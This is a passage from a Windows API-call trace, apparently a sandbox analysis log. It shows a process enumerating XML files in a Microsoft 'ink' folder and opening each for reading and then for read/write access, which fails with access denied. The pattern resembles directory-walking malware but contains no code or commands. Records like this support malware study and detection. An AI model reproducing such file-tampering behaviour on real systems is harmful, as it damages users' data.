hHeap=0x20000) returned 1 [0084.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0084.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0084.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0084.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0084.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0084.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0084.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.450] AreFileApisANSI () returned 1 [0084.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml", lpUsedDefaultChar=0x0) returned 62 [0084.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0084.450] AreFileApisANSI () returned 1 [0084.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e4f8 [0084.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6e4f8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml") returned 62 [0084.450] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.451] GetFileType (hFile=0x364) returned 0x1 [0084.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0084.452] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.452] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.452] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.452] CloseHandle (hObject=0x364) returned 1 [0084.452] AreFileApisANSI () returned 1 [0084.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ea48 [0084.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml") returned 62 [0084.452] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.452] GetLastError () returned 0x5 [0084.452] GetLastError () returned 0x5 [0084.452] SetLastError (dwErrCode=0x5) [0084.452] GetLastError () returned 0x5 [0084.453] SetLastError (dwErrCode=0x5) [0084.453] GetLastError () returned 0x5 [0084.453] SetLastError (dwErrCode=0x5) [0084.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0084.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.453] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.453] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.453] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9d2, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipsdan.xml", cAlternateFileName="")) returned 1 [0084.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0084.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0084.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0084.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0084.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0084.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0084.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0084.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0084.453] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.453] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0084.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.454] AreFileApisANSI () returned 1 [0084.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml", lpUsedDefaultChar=0x0) returned 62 [0084.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0084.454] AreFileApisANSI () returned 1 [0084.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ea48 [0084.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml") returned 62 [0084.454] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.454] GetFileType (hFile=0x364) returned 0x1 [0084.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0084.454] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.455] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.455] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.455] CloseHandle (hObject=0x364) returned 1 [0084.455] AreFileApisANSI () returned 1 [0084.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e470 [0084.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6e470, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml") returned 62 [0084.455] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.455] GetLastError () returned 0x5 [0084.455] GetLastError () returned 0x5 [0084.455] SetLastError (dwErrCode=0x5) [0084.455] GetLastError () returned 0x5 [0084.455] SetLastError (dwErrCode=0x5) [0084.455] GetLastError () returned 0x5 [0084.455] SetLastError (dwErrCode=0x5) [0084.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0084.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.456] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.456] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.456] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa38, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipsdeu.xml", cAlternateFileName="")) returned 1 [0084.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0084.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0084.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0084.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0084.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0084.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0084.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0084.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0084.456] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.456] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.456] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.456] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0084.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.457] AreFileApisANSI () returned 1 [0084.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml", lpUsedDefaultChar=0x0) returned 62 [0084.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52fc8 [0084.457] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.457] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0084.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0084.457] AreFileApisANSI () returned 1 [0084.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52fc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e250 [0084.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52fc8, cbMultiByte=-1, lpWideCharStr=0x6e250, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml") returned 62 [0084.457] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.457] GetFileType (hFile=0x364) returned 0x1 [0084.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0084.457] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.457] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.458] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.458] CloseHandle (hObject=0x364) returned 1 [0084.458] AreFileApisANSI () returned 1 [0084.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52fc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e4f8 [0084.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52fc8, cbMultiByte=-1, lpWideCharStr=0x6e4f8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml") returned 62 [0084.458] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.458] GetLastError () returned 0x5 [0084.458] GetLastError () returned 0x5 [0084.458] SetLastError (dwErrCode=0x5) [0084.458] GetLastError () returned 0x5 [0084.458] SetLastError (dwErrCode=0x5) [0084.458] GetLastError () returned 0x5 [0084.458] SetLastError (dwErrCode=0x5) [0084.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0084.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0084.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0084.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52fc8 | out: hHeap=0x20000) returned 1 [0084.459] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.459] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.459] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa3a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipsel.xml", cAlternateFileName="")) returned 1 [0084.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0084.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0084.459] HeapFree (in: hHeap=0x20000, 